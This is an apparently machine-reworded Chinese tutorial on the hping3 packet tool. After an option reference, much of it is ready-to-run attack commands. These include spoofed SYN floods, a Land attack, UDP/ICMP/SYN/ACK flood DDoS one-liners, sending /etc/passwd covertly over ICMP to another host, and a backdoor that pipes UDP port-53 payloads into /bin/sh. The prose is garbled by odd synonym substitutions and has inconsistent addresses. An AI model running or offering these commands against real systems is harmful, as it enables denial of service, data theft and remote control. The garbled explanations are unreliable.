hping3

hping3是一款可以用以协助客户在使用电子计算机命令来转化成和分析TCP/IP协议数据选编/剖析的完全免费开源系统专用工具，适用多种多样协义，在系统结构上面可以比较平稳的运作，协助客户迅速的检测网络信息安全这些一系列的作用

APP作用

- 服务器防火墙检测

- 高級端口扫描仪

- 网络检测，应用不一样的协义，TOS，分块

- 手动式途径MTU发觉

- 在全部适用的协义下，高級traceroute

- 远程控制电脑操作系统指纹识别

- 远程控制一切正常运转時间猜想

- TCP/IP协议栈财务审计

- hping还可以用以学习培训TCP/IP的学员

软件简介

使用方法: hping3 host [options]

-h --help 表明协助

-v --version 表明版本号

-c --count 发送数据的数额

-i --interval 发送数据间距的時间 (uX即X微秒, 比如： -i u1000)

--fast 同等 -i u10000 (每秒钟10个包)

--faster 同等 -i u1000 (每秒钟100个包)

--flood 尽更快发送数据，无法显示回应。

-n --numeric 智能化导出，象征意义导出主机地址。

-q --quiet 安安静静模式

-I --interface 网口插口 (默认路由插口)

-V --verbose 详尽模式

-D --debug 调试信息

-z --bind 关联ctrl z到ttl(默认设置为目地端口)

-Z --unbind 撤消关联ctrl z键

--beep 针对接受到的每一个配对数据蜂鸣声提醒

模式闪光点

模式挑选

default mode TCP // 默认设置模式是 TCP

-0 --rawip RAWIP模式，初始IP模式。在这里模式下HPING会发送带数据信息的IP头。即裸IP方法。应用RAWSOCKET方法。

-1 --icmp ICMP模式，此模式下HPING会发送IGMP回复报，你能用--ICMPTYPE --ICMPCODE选择项发送其他类型/模式的ICMP报文格式。

-2 --udp UDP 模式，缺省下，HPING会发送UDP报文格式到服务器的0端口，你能用--baseport --destport --keep选择项特定其模式。

-8 --scan SCAN mode. //扫描仪模式 特定扫描仪相匹配的端口。

Example: hping --scan 1-30,70-90 -S www.target.host // 扫描仪

-9 --listen listen mode // 监视模式

IP 模式

-a --spoof spoof source address //服务器ip蒙骗。仿冒IP进攻，服务器防火墙就不容易纪录你的真正IP了，自然回复的包你也接受不到了。

--rand-dest random destionation address mode. see the man. // 任意目地详细地址模式。详尽应用 man 指令

--rand-source random source address mode. see the man. // 任意服务器ip模式。详尽应用 man 指令

软件功能

服务器防火墙检测

应用Hping3特定各种各样数据字段名，先后对服务器防火墙开展详尽检测。请参照：http://0daysecurity.com/articles/hping3_examples.html

检测服务器防火墙对ICMP包的反映、是不是适用traceroute、是不是对外开放某一端口、对服务器防火墙开展拒绝服务攻击(DoS attack)。比如，以LandAttack方法检测总体目标服务器防火墙(Land Attack是将发送服务器ip设定为与总体目标详细地址同样，引诱总体目标机与自身不断地创建联接)。

hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

端口扫描仪

Hping3还可以对总体目标端口开展扫描仪。Hping3适用特定TCP每个标志位、长短等信息内容。下列实例可用以检测总体目标机的80端口是不是对外开放：

hping3 -I eth0 -S 192.168.10.1 -p 80

在其中-I eth0特定应用eth0端口，-S特定TCP包的标志位SYN，-p 80特定检测的目地端口。

hping3适用比较丰富的端口检测方法，nmap有着的扫描仪方法hping3几乎都适用(除了connect方法，由于Hping3仅发送与接受包，不容易维护保养联接，因此不兼容connect方法检测)。并且Hping3可以对发送的检测开展更为细致的操纵，便捷客户调整检测結果。自然，Hping3的端口扫描仪特性及综合性解决工作能力，没法与Nmap对比。一般应用它仅对小量服务器的小量端口开展扫描仪。

Idle扫描仪

Idle扫描仪(Idle Scanning)是一种密名扫描仪远程控制服务器的方法，该模式也是有Hping3的创作者Salvatore Sanfilippo创造发明的，现阶段Idle扫描仪在Nmap中也有完成。

该扫描仪基本原理是：找寻一台idle服务器(该服务器没有的数据流量，而且IPID是逐一提高的)，进攻端服务器先往idle服务器发送检测包，从回应库中获得其IPID。假冒idle服务器的IP地址向远程控制服务器的端口发送SYN包(这里假定为SYN包)，这时假如远程控制服务器的目地端口对外开放，那麼会回应SYN/ACK，这时idle服务器接到SYN/ACK后回应RST包。随后进攻端服务器再向idle服务器发送检测包，获得其IPID。那麼比照2次的IPID值，大家就可以分辨远程控制服务器是不是回应了数据，进而间接的推断其端口情况。

拒绝服务攻击

应用Hping3可以很便捷搭建拒绝服务攻击。例如对总体目标机进行很多SYN联接，仿冒服务器ip为192.168.10.99，并应用1000微秒的间距发送每个SYN包。

hping3 -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000

别的进攻如smurf、teardrop、land attack等也非常容易搭建出去。

文件传送

Hping3适用根据TCP/UDP/ICMP等包来开展文件传送。等同于依靠TCP/UDP/ICMP包创建秘密隧道施工通信。完成方法是打开监视端口，对检验到的签字(签字为客户特定的字符串数组)的內容开展对应的分析。在协调器打开服务项目：

hping3 192.168.1.159 --listen signature --safe --icmp

监视ICMP库中的签字，依据签字分析出文档內容。

在发送端应用签字封装的ICMP包发送文档：

hping3 192.168.1.108--icmp -d 100 --sign signature --file /etc/passwd

将/etc/passwd密码文件根据ICMP包发送给192.168.10.44服务器。发送包尺寸为100字节数(-d 100)，发送签字为signature(-sign signature)。

木马病毒作用

假如Hping3可以在远程控制服务器上运行，那麼可以做为恶意代码运行监视端口，并在创建联接后打开shell通讯。与netcat的侧门作用相近。

实例：当地开启53号UDP端口(DNS分析服务项目)监视来源于192.168.10.66服务器的包括签字为signature的数据，并将受到的数据信息读取/bin/sh实行。

在木马病毒运行端：

hping3 192.168.10.66 --listen signature --safe --udp -p 53 | /bin/sh

在远程操作端：

echo ls test.cmd

hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd

将包括ls命令的文档再加上签字signature发送到192.168.10.44服务器的53号UDP端口，包数据信息长短为100字节数。

自然这就是简易的演试程序流程，真正的情景，操纵端可以权益shell实行许多的高級更复杂的实际操作。

hping主要是开展DDOS进攻的

1、UDP ddos攻击：

hping3 -c 10000 -d 120 --udp -w 64 -p 80 --flood --rand-source

2、ICMP ddos攻击：

hping3 -c 10000 -d 120 --icmp -w 64 -p 80 --flood --rand-source

3、SYN ddos攻击：

hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source

4、ACK ddos攻击：

hping3 -c 10000 -d 120 -A -w 64 -p 80 --flood --rand-source